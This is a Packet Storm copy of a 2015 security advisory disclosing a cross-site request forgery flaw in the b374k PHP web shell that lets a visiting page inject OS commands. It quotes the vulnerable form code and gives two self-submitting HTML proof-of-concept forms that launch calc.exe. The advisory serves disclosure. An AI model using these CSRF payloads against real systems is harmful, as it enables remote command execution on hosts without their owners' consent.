exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

b374k 3.2.3 2.8 CSRF / Command Injection

b374k 3.2.3 2.8 CSRF / Command Injection
Posted Nov 13, 2015
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

b374k web shell versions 2.8 and 3.2.3 suffer from a cross site request forgery vulnerability that allows for remote command injection.

tags | exploit, remote, web, shell, csrf
SHA-256 | 7a3f5f494c2b27e756fd6b73c4b14796921e7612b045ce5d5b218e90626c8178

b374k 3.2.3 2.8 CSRF / Command Injection

Change Mirror Download
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-B374K-CSRF-CMD-INJECTION.txt



Vendor:
============================================
github.com/b374k/b374k
code.google.com/p/b374k-shell/downloads/list
code.google.com/archive/p/b374k-shell/



Product:
==============================================
b374k versions 3.2.3 and 2.8

b374k is a PHP Webshell with many features such as:

File manager (view, edit, rename, delete, upload, download as archive,etc)
Command execution, Script execution (php, perl, python, ruby, java,
node.js, c)
Give you shell via bind/reverse shell connect
Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more
using ODBC or PDO)
Process list/Task manager.

This is useful for system/web admin to do remote management without opening
cpanel, connecting using ssh,
ftp etc. All actions take place within a web browser.

Note:
b374k is considered by some as a malicious backdoor and is flagged by some
AV upon download.


Vulnerability Type:
=============================
CSRF Remote Command Injection




Vulnerability Details:
=====================

No CSRF protection exists in b374k Web Shell allowing arbitrary OS command
injection, if currently
logged in user visits our malicious website or clicks our infected linxs.

vulnerable b374k code:

<?php
if(isset($_GP['cmd'])) <------ $_GP holds value of $_GET passed to the
shell.

<form action='<?php echo $s_self; ?>' method='post'>
<input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd'
style='width:70%;' value='<?php
if(isset($_GP['cmd'])) echo "";

else echo "- shell command -";
?>' />
<noscript><input class='inputzbut' type='submit' value='Go !'
name='submitcmd' style='width:80px;' /></noscript>

</form>


Exploit code(s):
=================

Run Windows calc.exe as POC...

[CSRF Command Injections]

v3.2


Adding password and packing to b374k single PHP file.

c:\xampp\htdocs\b374k-master>php -f index.php -- -o myshell.php -p abc123
-s -b -z gzcompress -c 9
b374k shell packer 0.4.2

Filename : myshell.php
Password : xxxxxx
Theme : default
Modules : convert,database,info,mail,network,processes
Strip : yes
Base64 : yes
Compression : gzcompress
Compression level : 9
Result : Succeeded : [ myshell.php ] Filesize : 111419


(CSRF Command injection 1)

<form id='ABYSMALGODS' action='
http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'
method='post'>
<input id='cmd' type='text' name='terminalInput' value='calc.exe' />
<script>document.getElementById('ABYSMALGODS').submit()</script>
</form>



v2.8

(CSRF Command injection 2)

<form id='HELL' action='http://localhost/b374k-2.8.php?' method='post'>
<input id='cmd' type='text' name='cmd' value='calc.exe' />
<script>document.getElementById('HELL').submit()</script>
</form>


Exploitation Technique:
=======================
Remote




Severity Level:
===============
High




Description:
==================================================

Request Method(s): [+] POST


Vulnerable Product: [+] b374k 3.2 and 2.8


Vulnerable Parameter(s): [+] terminalInput, cmd


Affected Area(s): [+] OS



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close